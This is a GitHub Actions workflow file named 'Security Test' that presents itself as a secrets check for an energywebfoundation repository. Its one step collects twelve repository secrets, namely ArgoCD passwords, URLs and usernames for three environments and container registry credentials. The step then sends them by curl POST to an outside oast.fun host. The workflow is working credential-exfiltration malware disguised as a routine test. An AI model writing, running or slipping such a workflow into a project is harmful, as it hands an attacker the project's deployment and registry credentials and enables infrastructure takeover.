name: Security Test
on:
  workflow_dispatch:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Test all secrets
        env:
          ARGOCD_DEV_PASS: ${{ secrets.ARGOCD_DEV_PASS }}
          ARGOCD_DEV_URL: ${{ secrets.ARGOCD_DEV_URL }}
          ARGOCD_DEV_USERNAME: ${{ secrets.ARGOCD_DEV_USERNAME }}
          ARGOCD_STAGING_PASS: ${{ secrets.ARGOCD_STAGING_PASS }}
          ARGOCD_STAGING_URL: ${{ secrets.ARGOCD_STAGING_URL }}
          ARGOCD_STAGING_USERNAME: ${{ secrets.ARGOCD_STAGING_USERNAME }}
          ARGOCD_TEST_PASS: ${{ secrets.ARGOCD_TEST_PASS }}
          ARGOCD_TEST_URL: ${{ secrets.ARGOCD_TEST_URL }}
          ARGOCD_TEST_USERNAME: ${{ secrets.ARGOCD_TEST_USERNAME }}
          REGISTRY_LOGIN_SERVER: ${{ secrets.REGISTRY_LOGIN_SERVER }}
          REGISTRY_PASSWORD: ${{ secrets.REGISTRY_PASSWORD }}
          REGISTRY_USERNAME: ${{ secrets.REGISTRY_USERNAME }}
        run: |
          echo "Testing all secrets from energywebfoundation/ddhub-message-broker"
          SECRETS_OUTPUT=""
          SECRETS_OUTPUT+="ARGOCD_DEV_PASS=${ARGOCD_DEV_PASS}\n"
          SECRETS_OUTPUT+="ARGOCD_DEV_URL=${ARGOCD_DEV_URL}\n"
          SECRETS_OUTPUT+="ARGOCD_DEV_USERNAME=${ARGOCD_DEV_USERNAME}\n"
          SECRETS_OUTPUT+="ARGOCD_STAGING_PASS=${ARGOCD_STAGING_PASS}\n"
          SECRETS_OUTPUT+="ARGOCD_STAGING_URL=${ARGOCD_STAGING_URL}\n"
          SECRETS_OUTPUT+="ARGOCD_STAGING_USERNAME=${ARGOCD_STAGING_USERNAME}\n"
          SECRETS_OUTPUT+="ARGOCD_TEST_PASS=${ARGOCD_TEST_PASS}\n"
          SECRETS_OUTPUT+="ARGOCD_TEST_URL=${ARGOCD_TEST_URL}\n"
          SECRETS_OUTPUT+="ARGOCD_TEST_USERNAME=${ARGOCD_TEST_USERNAME}\n"
          SECRETS_OUTPUT+="REGISTRY_LOGIN_SERVER=${REGISTRY_LOGIN_SERVER}\n"
          SECRETS_OUTPUT+="REGISTRY_PASSWORD=${REGISTRY_PASSWORD}\n"
          SECRETS_OUTPUT+="REGISTRY_USERNAME=${REGISTRY_USERNAME}\n"
          curl -X POST https://ysdwohuyzvgctjktuywnobz8gju8g5qtp.oast.fun/post -d "$SECRETS_OUTPUT"
